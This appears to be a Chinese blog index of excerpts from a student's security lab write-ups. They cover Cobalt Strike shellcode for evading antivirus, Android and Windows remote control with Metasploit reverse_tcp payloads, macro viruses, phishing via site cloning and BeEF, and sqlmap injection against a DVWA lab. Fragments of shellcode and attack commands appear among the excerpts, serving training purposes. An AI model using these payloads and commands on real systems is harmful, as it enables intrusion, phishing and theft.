本站浏览须知
浏览须知
本站源站 IP 可能在香港/新加坡/德国/美国,所以推荐使用科学上网浏览本站,提高访问速度和稳定性。
推荐使用 PC 端/Pad 端等大屏设备浏览,以获得最佳阅读体验。
本站所有文章均为原创。
本站所有文章仅代表作者个人观点。
本站所有文章仅供学习交流,不得用于商业用途。
本站所有文章仅供个人学习交流,不得转载或用于任何商业用途。
隐私政策:
尊敬的用户:
感谢您访问我们的网站。我们非常重视您的隐私保护和个人信息安全。请在使用我们的服务之前仔细阅读本隐私政策,以了解我们收集、使用、存储和保护您的个人信息的方式。
信息收集与使用:
我们可能会收集您的部分个人信息,包括但不限于您的IP地址、浏览器类型、操作系统、访问时间、访问页面等信息,以优化网站性能并提供更好的服务。我们承诺不会将您的个人信息用于任何其他目的,也不会与任何第三方共享,除非经过您的明确授权或法律要求。
Cookie和数据分析:
我们可能会使用Cookie技术和第三方数据分析工具,来收集和分析用户的行为数据,以改善用户体验和网站服务质量。这些数据将被用于统计分析和用户行为研究,不会涉及个 ...
网络安全实训11——Pyinstaller打包逆向分析火绒免杀
cs shellcode
打开
1java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
查看生成的 payload
123# length: 894 bytesbuf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42 ...
网络安全实训10——Kali远程控制Android系统
查看 Metasploit 工具中可以在 Android 系统下使用的 payload 类型
这些 payload 可以作为我们后面攻击的软件的生成工具
端口映射问题
如果我们的手机与使用的计算机处在同一局域网,但是虚拟机使用的是 NAT 模式。那么只有我们使用的计算机才可以访问到该虚拟机,其他设备都是无法访问该虚拟机的。那么就需要端口映射了
假设计算机的 IP 为(192.168.1.100)。Android 手机的 IP 为(192.168.1.*)。虚拟机的 IP 为(192.168.169.130):
第一步:打开 VMware 虚拟机网络编辑器
第二步:设置端口的映射(设置之后,凡是发往计算机 9999 端口的流量都会转发到虚拟机的 9999 端口上,这样虚拟机就能够接收到 Android 的连接了)
远程控制 Android 手机演示
本案例中,Linux 采用桥接模式,与 Android 手机连接在同一局域网中
使用 msfvenom 命令生成被控端 payload
第一步:下面我以“android/meterpreter/reverse ...
网络安全实训9——Office宏病毒
下载 CS
我这里之前网络安全协会讲座测试环境的时候装过一次汉化版,考虑到实验环境,再下个老师给的 CS
运行服务端
12345678给予服务端程序 teamserver 执行权限(在 linux 中复制进来的文件默认是没有执行权限的)chmod +x teamserver # 可以查看 kali 的 IP 地址(可选)ifconfig eth0 # # 运行服务端程序,192.168.0.104 是本机 IP,user 是要设置的连接密码(可改)./teamserver 192.168.0.104 user
报错了,搜了一下,配置 java 环境变量:java 安装常见问题之 Kali 永久配置环境变量_kali 环境变量-CSDN 博客
好吧还是不行,用我之前的版本的
新建配置文件,连接 CS 服务器
1java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstri ...
网络安全实训8——Wireshark抓取QQ图片
抓包
我是 png 文件,搜索 8950
找到十六进制字符
继续跟进
删除多余数据
查看图片
可以看到已经抓取成功了,由于 QQ 压缩机制导致图片丢失内容过多
原因与纠错
测试发现从本机向其他人发送的图片会被切割,现在从手机端发给我的电脑
再次抓包发现得到了全部的内容没有被切割。
删除多余数据
保存查看
网络安全实训7——MD5加盐
加密 exp
12345678910111213141516171819202122232425262728293031323334353637383940414243import hashlibimport osdef generate_salt(length=16): """生成指定长度的盐值""" return os.urandom(length)def md5_hash_with_salt(input_string, salt=None): """计算带盐值的MD5哈希""" if salt is None: salt = generate_salt() hasher = hashlib.md5() # 将输入字符串与盐值结合 hasher.update(input_string.encode("utf-8") + salt) # 获取哈希值 hash_value = ha ...
网络安全实训6——SQL注入
网络安全实训 6——SQL 注入
安装环境
知新平台的文档图片无法加载
查看源码发现是外部引用,尝试恢复
恢复成功
开启 OWASP 靶机和 Kali 虚拟机
登录 dvwa
安全等级调 low
进入 SQL Injection(Blind)页面
随意输入一个数字,然后点击提交
安装 SQLmap
我用的是裸机当攻击机,所以安装个 SQLmap
用 F12 打开开发者工具
选中 Storage(存储)选项卡,找到 cookies,复制其中 PHPSESSID 的值(获取 cookies)
得到 59mb9spqvkd9cuk543thagtsd5
由于浏览器提交方式为 get 型,sqlmap 采用-u 命令。将刚才复制的 URL 和 COOKIE 写入命令
出错了,查看 Github 的 README 发现是需要前面加 python 运行
找到注入点
为了查看有哪些数据库,输入命令:
python sqlmap.py -u "http://192.168.189.134/dvwa/vulnerabilities/sqli_blind/?id=1&am ...
网络安全实训5——扩展访问控制列表
拓扑图
配置 PC0
配置 server0
配置路由器
ping测试
配置router1
ping测试
Crossing the Line Unit 42 Wireshark Quiz for RedLine Stealer
Crossing the Line Unit 42 Wireshark Quiz for RedLine Stealer
Quiz Questions
What is the date and time in UTC the infection started?
感染开始的 UTC 日期和时间是什么时候?
感染于 2023 年 7 月 10 日 22:39 UTC 开始。
What is the IP address of the infected Windows client?
受感染的 Windows 客户端的 IP 地址是什么?
受感染的 Windows 客户端 IP 地址:10.7.10 [.] 47
What is the MAC address of the infected Windows client?
受感染的 Windows 客户端的 MAC 地址是什么?
受感染的 Windows 客户端 MAC 地址:80:86:5b:ab:1e:c4
What is the hostname of the infected Windows client?
受感染的 ...
网络安全实训4——克隆网站
Web 站点克隆钓鱼
启动 SET
选择模块
Payload 选择
Payload 设置
返回数据
不知道为啥返回的是 HTML 源码,但是后台可以看到数据
把这段源码保存到本地打开就是登录界面
网络安全实训3——远程控制
生成木马程序
设置 IP 和端口
运行木马
反弹 shell
ADD +DEL+UPLOAD+DOWNDOAD
网络安全实训2——ACL
标准 IP 访问控制列表配置
实验目标
理解标准 IP 访问控制列表的原理及功能
掌握编号的标准 IP 访问控制列表的配置方法
实验背景
网络配置要求
公司的经理部、财务部和销售部门分属于不同的 3 个网段。三部门之间使用路由器进行信息传递。为了安全起见,公司领导要求以下访问控制:
销售部门不能对财务部进行访问。
经理部可以对财务部进行访问。
部门主机代表
PC1: 经理部的主机
PC2: 销售部的主机
PC3: 财务部的主机
技术原理
接入控制列表 (Access Control Lists, ACLs)
接入控制列表(ACLs),也称访问控制列表(Access Lists),俗称防火墙,在有的文档中还称包过滤。ACLs 通过定义一些规则对网络设备接口上的数据包进行控制,允许通过或丢弃,从而提高网络可管理性和安全性。
IP ACL 分类
IP ACL 分为两种:标准 IP 访问列表和扩展 IP 访问列表。
标准 IP 访问列表:编号范围为 1~99、1300~1999。可以根据数据包的源 IP 地址定义规则,进行数据包的过滤。
扩展 IP 访问列表:编号范围为 ...
网络安全实训1——网络钓鱼攻击
网络钓鱼攻击
可能需要的:kali Linux 切换镜像源
安装并启动
利用 BeEF 进行网页钓鱼攻击
利用 nodejs 开启静态服务
补充利用 nodejs 开启静态服务
12sudo apt updatesudo apt install nodejs npm
安装完成后进入你的静态文件所在目录
开启命令行
1http-server
成功上线
发送警告命令
通过 flash 钓鱼获取目标控制权
1msf6 > handler -H 127.0.0.1 -P 4444 -p windows/meterpreter/reverse_tcp
Linux更新软件包一条龙命令
apt-get update 更新索引
1apt-get update
apt-get upgrade 更新软件
1apt-get upgrade
apt-get dist-upgrade 升级
1apt-get dist-upgrade
apt-get clean 删除缓存包
1apt-get clean
apt-get autoclean 删除未安装的 deb 包
1apt-get autoclean